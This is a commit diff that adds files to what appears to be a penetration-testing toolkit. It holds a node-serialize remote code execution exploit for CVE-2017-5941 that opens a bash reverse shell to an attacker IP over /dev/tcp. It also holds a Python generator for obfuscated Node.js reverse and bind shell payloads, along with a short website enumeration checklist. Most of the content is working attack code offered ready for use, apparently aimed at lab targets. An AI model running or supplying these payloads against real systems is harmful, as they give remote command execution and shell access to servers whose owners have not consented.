bump

49552.py

@@ -0,0 +1,47 @@
+# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
+# Exploit Author: UndeadLarva
+# Software Link: https://www.npmjs.com/package/node-serialize
+# Version: 0.0.4
+# CVE: CVE-2017-5941
+
+import requests
+import re
+import base64
+import sys
+
+url = 'http://10.10.216.3/' # change this
+
+payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
+"return function () {"
+"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
+"console.log('still inside');"
+"const { exec } = require('child_process');"
+"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this
+"}"
+"})(require('http').ServerResponse.prototype.end)")
+
+# rce = "_$$ND_FUNC$$_process.exit(0)"
+#code ="_$$ND_FUNC$$_console.log('behind you')"
+#code  = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"
+#code = "_$$ND_FUNC$$_" + payload
+
+code = "_$$ND_FUNC$$_console.log(1)()"
+#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()"
+#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
+#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this
+code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}()&#x3b;"
+string = '{"email": "'+code+'"}'
+
+print code 
+
+cookie = {'session':base64.b64encode(string)}
+
+response = requests.post(url+"?email="+code).text
+print response
+
+#try:
+#    response = requests.get(url, cookies=cookie).text
+#    print response
+#except requests.exceptions.RequestException as e:
+#    print('Oops!')
+#    sys.exit(1)

enumeration/docs/websites.md

@@ -0,0 +1,12 @@
+# Website Enumeration
+
+* `robots.txt`
+* [Favicon](https://wiki.owasp.org/index.php/OWASP_favicon_database), `curl` target and `md5sum`
+* `sitemap.xml`
+* Headers, `curl <site>` including `-I` or `-v` parameters
+* Check Components of the website, like blog frameworks, shops.
+* User Wappalyzer
+* Snapshots of the site via waybackmachine
+* Check repos of the site
+* Check buckets
+* Fuzz

reverse_shells/node_shell.py

@@ -0,0 +1,129 @@
+#!/usr/bin/python
+# Author: Hd7exploit
+# hd7exploit.wordpress.com
+# Based on https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+import getopt, sys
+
+def usage():
+    print '''
+Usage: %s <TYPE> <HOST> <PORT> <ENCODE>
+
+Help:
+    -c : Run some linux commands (ls,cat...)
+    -r : Get payload reverse shell
+    -b : Get payload bind shell
+    -h : IP address in case of reverse shell
+    -p : Port
+    -e : Encode shell
+    -o : Create a object contain payload with Immediately invoked function expression (IIFE)
+    ''' % (sys.argv[0])
+
+try:
+    opts, args = getopt.getopt(sys.argv[1:], "c:h:rbp:eo", ["help"])
+    if not opts:
+        usage()
+        sys.exit()
+except getopt.GetoptError:
+    usage()
+    sys.exit(2)
+
+type = host = port = command = ""
+encode = False
+object = False
+for o, a in opts:
+    if o == "-r":
+        type = 'REVERSE'
+    if o == "-b":
+        type = 'BIND'
+    if o == "-h":
+        host = a
+    if o == "-o":
+        object = True
+    if o == "-p":
+        port = a
+    if o == "-c":
+        type = 'COMMAND'
+        command = a
+    if o == "-e":
+        encode = True
+    if o == "--help":
+        usage()
+        sys.exit()
+
+def get_reverse_shell():
+    return '''
+    var net = require('net');
+    var spawn = require('child_process').spawn;
+    HOST="%s";
+    PORT="%s";
+    TIMEOUT="5000";
+    if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
+    function c(HOST,PORT) {
+        var client = new net.Socket();
+        client.connect(PORT, HOST, function() {
+            var sh = spawn('/bin/sh',[]);
+            client.write("Connected!\\n");
+            client.pipe(sh.stdin);
+            sh.stdout.pipe(client);
+            sh.stderr.pipe(client);
+            sh.on('exit',function(code,signal){
+              client.end("Disconnected!\\n");
+            });
+        });
+        client.on('error', function(e) {
+            setTimeout(c(HOST,PORT), TIMEOUT);
+        });
+    }
+    c(HOST,PORT);
+    ''' % (host, port)
+
+def get_bind_shell():
+    return '''
+    var net = require('net');
+    var spawn = require('child_process').spawn;
+    PORT="%s";
+    if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
+    var server = net.createServer(function (c) {
+        var sh = spawn('/bin/sh', ['-i']);
+        c.pipe(sh.stdin);
+        sh.stdout.pipe(c);
+        sh.stderr.pipe(c);
+    });
+    server.listen(PORT);
+    ''' % (port)
+
+
+def get_command(command):
+    return '''
+        require('child_process').exec('%s', function(error, stdout, stderr) {
+            console.log(error)
+            console.log(stdout)
+        })
+        ''' % (command)
+
+def encode_string(string):
+    string_encoded = ''
+    for char in string:
+        string_encoded += "," + str(ord(char))
+    return string_encoded[1:]
+
+payload = ""
+if type == 'BIND':
+    payload = get_bind_shell()
+elif type == 'REVERSE':
+    payload = get_reverse_shell()
+else:
+    payload = get_command(command);
+
+if encode:
+    payload = encode_string(payload)
+
+if object:
+    payload = '''
+    {"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(%s))}()"}
+    ''' % (payload)
+
+print '''
+    =======> Happy hacking <======
+'''
+print payload